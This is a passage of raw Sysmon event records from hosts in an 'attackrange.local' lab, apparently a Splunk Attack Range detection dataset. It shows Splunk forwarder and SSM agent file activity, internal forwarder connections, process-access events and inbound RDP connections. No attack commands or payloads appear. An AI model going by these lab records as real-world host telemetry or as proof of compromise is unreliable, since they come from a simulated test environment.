Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA9F7E41FD091F55BE6EFFA9BA320E3F,SHA256=A61F8D473CEB020C7D70C210222F766E47723BED7EE3A33471677B0676F4FD80,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:31.775{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53417-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:33.619{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E06D9F82901D379415F8C4A25E590A9,SHA256=EF993A99C788C36FA72371DDCC6FAD74AED730D121BF67BEBF8E2861F9DAA20C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979614Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:33.246{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4B3AE2609C2A5D7F52A46ADF381412F,SHA256=84CEE3FE4721B0C9BE5919D56561AA1AC75382E6DADCB7BA08D3BA1CBDE5FC06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979618Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:34.793{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=952851AEDB2DD972831CE5A8B36A1FD8,SHA256=0E96C7F45A660AEB3349BFC5EC5B1815DCBA24D39153BB30303E37F4BF7EEB43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:34.649{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D8FF50D11FE1515A82AAB1841634806,SHA256=DCD2A327FEF1BBB66A4259DBE9297D26D0810AD884D24FA6C4957FC942EF3E7B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979617Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:31.668{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59429-false10.0.1.12-8000- 354300x8000000000000000979616Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:30.519{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59663-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001050885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:35.650{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FEEF85A086F6976C2EB2EB27CA706C9,SHA256=BDB9E8AA63FEF851E7C11F388EEFE80B8E107EC202FD0DF2084ADD0F0FCC7E5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:36.904{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4311MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:36.733{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:36.664{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B54345F2B71F10D44CC4479E19F9F4,SHA256=260F46A93C2BF571A5A820C73A9727264AAF567BFE9BA64250AAF7B0BFC0E97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979619Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:36.012{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1CBCF455C354F748EB4FF91C027933F,SHA256=A342FCF7D48B2CDA07FF1ACB05190F9F7CC9A5AD80918DA76F143596E9134FD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979633Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BB9-6151-E279-00000000FD01}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979632Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979631Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979630Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979629Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979628Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979627Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979626Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979625Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979624Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979623Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8BB9-6151-E279-00000000FD01}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979622Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.465{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BB9-6151-E279-00000000FD01}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979621Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.435{69CF5F33-8BB9-6151-E279-00000000FD01}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979620Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:37.106{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D459378A182AD0EC7D75FDB8867504DB,SHA256=8DCBE4F4DD2163115BEA79C18423EFA22113446F2D058B10F0B6B399C195211F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:37.918{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4312MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:37.685{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0C19D6EE220EE84C4E1B07CA21846D9,SHA256=FEB81D93EB1C18FD0456FB70D62DE6CC338401AD0C078E96B3AF881CFBC820F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979637Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:35.711{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61312-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979636Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:38.653{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=287370D41BC80FD3A1369350AAB68942,SHA256=470F7854BCF008A3FF6FE10E0502665A90CBD60115F531582DF3310BF95E0D13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979635Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:38.653{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19A960EB4021359741E3225A16939BAC,SHA256=B537D0BB537D05B7F92C2485D6CD1BE75BD0F1F878F856B53B3673E644A3D2D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979634Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:38.340{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E812E6A07B9F265B499E93577097408,SHA256=B158D614FAD90D3580859DA95D9384E553CF2C507975F01E2B1054D18D60E076,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:38.700{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0631F57859867587E53A6C76FFB35A10,SHA256=282EC749E3E0F9665B2FF07F7F5BBF93881DE4240FC6543A0EFE264FD01DBCE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:38.467{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DACBD4A9EEC3E9B2FCE7DA347649185B,SHA256=43C137C1F1E14A5CC1EBBA5613579D7F7E937E29FBDDD6D3908099DBFC9D2553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:38.467{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20FD2229DCECB9875D80A2579ED4168B,SHA256=69741D9710C2423A71438975F0E6CFAAA9E7882BEA638660D9511EEBD8A7B321,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:36.409{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53418-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000979638Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:39.574{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC07F49ACB5C5FA65FF62A043BED30E4,SHA256=1F4CF229CA7E36014DEEA53618AE144A0AE855083BB5C40FDC0236AF636B7C1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:39.715{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78FF1CBB3174915EF0319E188ED44AD8,SHA256=7AFC20BA162BF3230AF3796D89598B8ED32AB8D190BBBF779452F4229B27B16C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:39.315{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=35F8A9A65E886E834AC389D9167A846A,SHA256=549BC26456F2D3A6459C9007D53B73C19C49DBF7CD88F878F46F55D217DFF7BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:37.047{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61518-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001050895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:36.822{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 